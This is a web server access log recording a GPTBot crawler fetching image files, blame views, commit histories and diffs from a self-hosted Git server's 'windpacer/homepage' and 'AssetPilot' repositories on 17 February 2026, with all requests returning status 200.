"/windpacer/homepage/src/commit/7e5f452449b5385fa46a3a589ed6aac00a02734a/html/assets/images/ControlRoom2.png" [Client 74.7.227.38] [Length 10847] [Gzip 2.97] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/7e5f452449b5385fa46a3a589ed6aac00a02734a/html/assets/images" +[17/Feb/2026:13:40:45 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/raw/commit/63aec54418d3c1735d68bf046c7a9e78a247798d/.Backup/html/components/Services.tsx" [Client 74.7.227.38] [Length 3708] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/63aec54418d3c1735d68bf046c7a9e78a247798d/.Backup/html/components/Services.tsx" +[17/Feb/2026:13:40:45 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/src/commit/63aec54418d3c1735d68bf046c7a9e78a247798d/html/assets/images/ControlRoom5.png" [Client 74.7.227.38] [Length 10849] [Gzip 2.97] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/63aec54418d3c1735d68bf046c7a9e78a247798d/html/assets/images" +[17/Feb/2026:13:40:46 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/src/commit/63aec54418d3c1735d68bf046c7a9e78a247798d/html/assets/images/ControlRoom4.png" [Client 74.7.227.38] [Length 10853] [Gzip 2.97] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/63aec54418d3c1735d68bf046c7a9e78a247798d/html/assets/images" +[17/Feb/2026:13:40:46 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/src/commit/63aec54418d3c1735d68bf046c7a9e78a247798d/html/assets/images/ControlRoom6.png" [Client 74.7.227.38] [Length 10853] [Gzip 2.97] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/63aec54418d3c1735d68bf046c7a9e78a247798d/html/assets/images" +[17/Feb/2026:13:40:53 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/blame/commit/63aec54418d3c1735d68bf046c7a9e78a247798d/html/assets/images/ControlRoom1.png" [Client 74.7.227.38] [Length 6429929] [Gzip 11.86] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/63aec54418d3c1735d68bf046c7a9e78a247798d/html/assets/images/ControlRoom1.png" +[17/Feb/2026:13:40:59 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/blame/commit/7e5f452449b5385fa46a3a589ed6aac00a02734a/html/assets/images/ControlRoom4.png" [Client 74.7.227.38] [Length 5699390] [Gzip 12.00] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/7e5f452449b5385fa46a3a589ed6aac00a02734a/html/assets/images/ControlRoom4.png" +[17/Feb/2026:13:41:00 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/commits/commit/63aec54418d3c1735d68bf046c7a9e78a247798d/html/assets/images/ControlRoom1.png" [Client 74.7.227.38] [Length 9888] [Gzip 2.85] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/63aec54418d3c1735d68bf046c7a9e78a247798d/html/assets/images/ControlRoom1.png" +[17/Feb/2026:13:41:00 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/commits/commit/7e5f452449b5385fa46a3a589ed6aac00a02734a/html/assets/images/ControlRoom4.png" [Client 74.7.227.38] [Length 9885] [Gzip 2.85] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/7e5f452449b5385fa46a3a589ed6aac00a02734a/html/assets/images/ControlRoom4.png" +[17/Feb/2026:13:41:01 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/raw/commit/63aec54418d3c1735d68bf046c7a9e78a247798d/html/assets/images/ControlRoom1.png" [Client 74.7.227.38] [Length 2082919] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/63aec54418d3c1735d68bf046c7a9e78a247798d/html/assets/images/ControlRoom1.png" +[17/Feb/2026:13:41:07 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/blame/commit/a0a212e41c7ebc2699ea736d71d145b9844673ec/html/assets/images/ControlRoom5.png" [Client 74.7.227.38] [Length 5498825] [Gzip 11.91] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/a0a212e41c7ebc2699ea736d71d145b9844673ec/html/assets/images/ControlRoom5.png" +[17/Feb/2026:13:41:15 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/blame/commit/7e5f452449b5385fa46a3a589ed6aac00a02734a/html/assets/images/ControlRoom2.png" [Client 74.7.227.38] [Length 7641785] [Gzip 11.86] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/7e5f452449b5385fa46a3a589ed6aac00a02734a/html/assets/images/ControlRoom2.png" +[17/Feb/2026:13:41:15 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/commits/commit/7e5f452449b5385fa46a3a589ed6aac00a02734a/html/assets/images/ControlRoom2.png" [Client 74.7.227.38] [Length 9885] [Gzip 2.85] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/7e5f452449b5385fa46a3a589ed6aac00a02734a/html/assets/images/ControlRoom2.png" +[17/Feb/2026:13:41:22 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/blame/commit/63aec54418d3c1735d68bf046c7a9e78a247798d/html/assets/images/ControlRoom5.png" [Client 74.7.227.38] [Length 5498827] [Gzip 11.91] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/63aec54418d3c1735d68bf046c7a9e78a247798d/html/assets/images/ControlRoom5.png" +[17/Feb/2026:13:41:28 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/blame/commit/63aec54418d3c1735d68bf046c7a9e78a247798d/html/assets/images/ControlRoom4.png" [Client 74.7.227.38] [Length 5699378] [Gzip 12.00] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/63aec54418d3c1735d68bf046c7a9e78a247798d/html/assets/images/ControlRoom4.png" +[17/Feb/2026:13:41:35 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/blame/commit/63aec54418d3c1735d68bf046c7a9e78a247798d/html/assets/images/ControlRoom6.png" [Client 74.7.227.38] [Length 6508448] [Gzip 12.00] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/63aec54418d3c1735d68bf046c7a9e78a247798d/html/assets/images/ControlRoom6.png" +[17/Feb/2026:13:41:35 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/commits/commit/63aec54418d3c1735d68bf046c7a9e78a247798d/html/assets/images/ControlRoom5.png" [Client 74.7.227.38] [Length 9887] [Gzip 2.85] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/63aec54418d3c1735d68bf046c7a9e78a247798d/html/assets/images/ControlRoom5.png" +[17/Feb/2026:13:41:36 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/commits/commit/a0a212e41c7ebc2699ea736d71d145b9844673ec/html/assets/images/ControlRoom5.png" [Client 74.7.227.38] [Length 9886] [Gzip 2.85] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/a0a212e41c7ebc2699ea736d71d145b9844673ec/html/assets/images/ControlRoom5.png" +[17/Feb/2026:13:41:37 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/commits/commit/63aec54418d3c1735d68bf046c7a9e78a247798d/html/assets/images/ControlRoom6.png" [Client 74.7.227.38] [Length 9887] [Gzip 2.85] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/63aec54418d3c1735d68bf046c7a9e78a247798d/html/assets/images/ControlRoom6.png" +[17/Feb/2026:13:41:37 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/commits/commit/63aec54418d3c1735d68bf046c7a9e78a247798d/html/assets/images/ControlRoom4.png" [Client 74.7.227.38] [Length 9887] [Gzip 2.85] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/63aec54418d3c1735d68bf046c7a9e78a247798d/html/assets/images/ControlRoom4.png" +[17/Feb/2026:13:41:38 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/raw/commit/7e5f452449b5385fa46a3a589ed6aac00a02734a/html/assets/images/ControlRoom2.png" [Client 74.7.227.38] [Length 2483659] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/7e5f452449b5385fa46a3a589ed6aac00a02734a/html/assets/images/ControlRoom2.png" +[17/Feb/2026:13:41:39 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/raw/commit/63aec54418d3c1735d68bf046c7a9e78a247798d/html/assets/images/ControlRoom6.png" [Client 74.7.227.38] [Length 2102057] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/63aec54418d3c1735d68bf046c7a9e78a247798d/html/assets/images/ControlRoom6.png" +[17/Feb/2026:13:41:39 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/raw/commit/a0a212e41c7ebc2699ea736d71d145b9844673ec/html/assets/images/ControlRoom5.png" [Client 74.7.227.38] [Length 1774975] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/a0a212e41c7ebc2699ea736d71d145b9844673ec/html/assets/images/ControlRoom5.png" +[17/Feb/2026:13:41:40 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/raw/commit/63aec54418d3c1735d68bf046c7a9e78a247798d/html/assets/images/ControlRoom5.png" [Client 74.7.227.38] [Length 1774975] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/63aec54418d3c1735d68bf046c7a9e78a247798d/html/assets/images/ControlRoom5.png" +[17/Feb/2026:13:41:40 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/raw/commit/63aec54418d3c1735d68bf046c7a9e78a247798d/html/assets/images/ControlRoom4.png" [Client 74.7.227.38] [Length 1851586] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/63aec54418d3c1735d68bf046c7a9e78a247798d/html/assets/images/ControlRoom4.png" +[17/Feb/2026:13:41:41 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/raw/commit/7e5f452449b5385fa46a3a589ed6aac00a02734a/html/assets/images/ControlRoom4.png" [Client 74.7.227.38] [Length 1851586] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/7e5f452449b5385fa46a3a589ed6aac00a02734a/html/assets/images/ControlRoom4.png" +[17/Feb/2026:13:41:41 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/src/commit/7e5f452449b5385fa46a3a589ed6aac00a02734a/html/assets/images/ControlRoom3.png" [Client 74.7.227.38] [Length 10847] [Gzip 2.97] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/7e5f452449b5385fa46a3a589ed6aac00a02734a/html/assets/images" +[17/Feb/2026:13:41:42 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/src/commit/a0a212e41c7ebc2699ea736d71d145b9844673ec/html/assets/images/ControlRoom4.png" [Client 74.7.227.38] [Length 10848] [Gzip 2.97] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/a0a212e41c7ebc2699ea736d71d145b9844673ec/html/assets/images" +[17/Feb/2026:13:41:42 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/src/commit/2681563c08aa04fbea2862fbca273762e67c16d6/html/assets/images/ControlRoom2.png" [Client 74.7.227.38] [Length 10849] [Gzip 2.97] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/2681563c08aa04fbea2862fbca273762e67c16d6/html/assets/images" +[17/Feb/2026:13:41:43 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/src/commit/a0a212e41c7ebc2699ea736d71d145b9844673ec/html/assets/images/ControlRoom6.png" [Client 74.7.227.38] [Length 10849] [Gzip 2.97] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/a0a212e41c7ebc2699ea736d71d145b9844673ec/html/assets/images" +[17/Feb/2026:13:41:43 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/src/commit/63aec54418d3c1735d68bf046c7a9e78a247798d/html/assets/images/ControlRoom2.png" [Client 74.7.227.38] [Length 10852] [Gzip 2.97] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/63aec54418d3c1735d68bf046c7a9e78a247798d/html/assets/images" +[17/Feb/2026:13:41:44 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/src/commit/2681563c08aa04fbea2862fbca273762e67c16d6/html/assets/images/ControlRoom4.png" [Client 74.7.227.38] [Length 10849] [Gzip 2.97] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/2681563c08aa04fbea2862fbca273762e67c16d6/html/assets/images" +[17/Feb/2026:13:41:44 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/commits/commit/adf9a81cb0ea52c9fa32f352b5800e021665bb47/.TemporaryDocument/DOCKER_GUIDE.md" [Client 74.7.227.38] [Length 9889] [Gzip 2.86] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/AssetPilot/src/commit/adf9a81cb0ea52c9fa32f352b5800e021665bb47/.TemporaryDocument/DOCKER_GUIDE.md" +[17/Feb/2026:13:41:45 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/src/commit/63aec54418d3c1735d68bf046c7a9e78a247798d/.Backup/html/assets/images" [Client 74.7.227.38] [Length 10206] [Gzip 3.24] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/63aec54418d3c1735d68bf046c7a9e78a247798d/.Backup/html/assets" +[17/Feb/2026:13:41:45 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/commit/998d733eb52423ffff2f8602efdfb1282198a61f?show-outdated=&style=split&whitespace=ignore-eol" [Client 74.7.227.38] [Length 36014] [Gzip 9.08] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/commit/998d733eb52423ffff2f8602efdfb1282198a61f?show-outdated=&style=unified&whitespace=ignore-eol" +[17/Feb/2026:13:41:46 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/commit/998d733eb52423ffff2f8602efdfb1282198a61f?show-outdated=&style=split&whitespace=ignore-all" [Client 74.7.227.38] [Length 36009] [Gzip 9.09] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/commit/998d733eb52423ffff2f8602efdfb1282198a61f?show-outdated=&style=unified&whitespace=ignore-all" +[17/Feb/2026:13:41:47 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/commits/commit/d4f1ca87ab7f1292db644da6b64b8d099a6c8e96/.TemporaryDocument" [Client 74.7.227.38] [Length 10286] [Gzip 3.48] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/AssetPilot/src/commit/d4f1ca87ab7f1292db644da6b64b8d099a6c8e96/.TemporaryDocument" +[17/Feb/2026:13:41:55 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/blame/commit/7e5f452449b5385fa46a3a589ed6aac00a02734a/html/assets/images/ControlRoom3.png" [Client 74.7.227.38] [Length 7692337] [Gzip 11.87] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/7e5f452449b5385fa46a3a589ed6aac00a02734a/html/assets/images/ControlRoom3.png" +[17/Feb/2026:13:42:01 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/blame/commit/a0a212e41c7ebc2699ea736d71d145b9844673ec/html/assets/images/ControlRoom4.png" [Client 74.7.227.38] [Length 5699389] [Gzip 12.00] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/a0a212e41c7ebc2699ea736d71d145b9844673ec/html/assets/images/ControlRoom4.png" +[17/Feb/2026:13:42:09 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/blame/commit/2681563c08aa04fbea2862fbca273762e67c16d6/html/assets/images/ControlRoom2.png" [Client 74.7.227.38] [Length 7641762] [Gzip 11.86] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/2681563c08aa04fbea2862fbca273762e67c16d6/html/assets/images/ControlRoom2.png" +[17/Feb/2026:13:42:16 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/blame/commit/a0a212e41c7ebc2699ea736d71d145b9844673ec/html/assets/images/ControlRoom6.png" [Client 74.7.227.38] [Length 6508445] [Gzip 12.00] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/a0a212e41c7ebc2699ea736d71d145b9844673ec/html/assets/images/ControlRoom6.png" +[17/Feb/2026:13:42:24 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/blame/commit/63aec54418d3c1735d68bf046c7a9e78a247798d/html/assets/images/ControlRoom2.png" [Client 74.7.227.38] [Length 7641794] [Gzip 11.86] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/63aec54418d3c1735d68bf046c7a9e78a247798d/html/assets/images/ControlRoom2.png" +[17/Feb/2026:13:42:30 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/blame/commit/2681563c08aa04fbea2862fbca273762e67c16d6/html/assets/images/ControlRoom4.png" [Client 74.7.227.38] [Length 5699379] [Gzip 12.00] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/2681563c08aa04fbea2862fbca273762e67c16d6/html/assets/images/ControlRoom4.png" +[17/Feb/2026:13:42:31 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/commits/commit/a0a212e41c7ebc2699ea736d71d145b9844673ec/html/assets/images/ControlRoom4.png" [Client 74.7.227.38] [Length 9885] [Gzip 2.85] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/a0a212e41c7ebc2699ea736d71d145b9844673ec/html/assets/images/ControlRoom4.png" +[17/Feb/2026:13:42:31 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/commits/commit/a0a212e41c7ebc2699ea736d71d145b9844673ec/html/assets/images/ControlRoom6.png" [Client 74.7.227.38] [Length 9886] [Gzip 2.85] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/a0a212e41c7ebc2699ea736d71d145b9844673ec/html/assets/images/ControlRoom6.png" +[17/Feb/2026:13:42:32 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/commits/commit/7e5f452449b5385fa46a3a589ed6aac00a02734a/html/assets/images/ControlRoom3.png" [Client 74.7.227.38] [Length 9885] [Gzip 2.85] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/7e5f452449b5385fa46a3a589ed6aac00a02734a/html/assets/images/ControlRoom3.png" +[17/Feb/2026:13:42:32 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/commits/commit/2681563c08aa04fbea2862fbca273762e67c16d6/html/assets/images/ControlRoom2.png" [Client 74.7.227.38] [Length 9885] [Gzip 2.85] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/2681563c08aa04fbea2862fbca273762e67c16d6/html/assets/images/ControlRoom2.png" +[17/Feb/2026:13:42:33 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/commits/commit/2681563c08aa04fbea2862fbca273762e67c16d6/html/assets/images/ControlRoom4.png" [Client 74.7.227.38] [Length 9885] [Gzip 2.85] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/2681563c08aa04fbea2862fbca273762e67c16d6/html/assets/images/ControlRoom4.png" +[17/Feb/2026:13:42:33 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/commits/commit/63aec54418d3c1735d68bf046c7a9e78a247798d/html/assets/images/ControlRoom2.png" [Client 74.7.227.38] [Length 9887] [Gzip 2.85] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/63aec54418d3c1735d68bf046c7a9e78a247798d/html/assets/images/ControlRoom2.png" +[17/Feb/2026:13:42:34 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/raw/commit/a0a212e41c7ebc2699ea736d71d145b9844673ec/html/assets/images/ControlRoom4.png" [Client 74.7.227.38] [Length 1851586] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/a0a212e41c7ebc2699ea736d71d145b9844673ec/html/assets/images/ControlRoom4.png" +[17/Feb/2026:13:42:35 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/raw/commit/2681563c08aa04fbea2862fbca273762e67c16d6/html/assets/images/ControlRoom2.png" [Client 74.7.227.38] [Length 2483659] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/2681563c08aa04fbea2862fbca273762e67c16d6/html/assets/images/ControlRoom2.png" +[17/Feb/2026:13:42:35 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/raw/commit/2681563c08aa04fbea2862fbca273762e67c16d6/html/assets/images/ControlRoom4.png" [Client 74.7.227.38] [Length 1851586] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/2681563c08aa04fbea2862fbca273762e67c16d6/html/assets/images/ControlRoom4.png" +[17/Feb/2026:13:42:36 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/raw/commit/a0a212e41c7ebc2699ea736d71d145b9844673ec/html/assets/images/ControlRoom6.png" [Client 74.7.227.38] [Length 2102057] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/a0a212e41c7ebc2699ea736d71d145b9844673ec/html/assets/images/ControlRoom6.png" 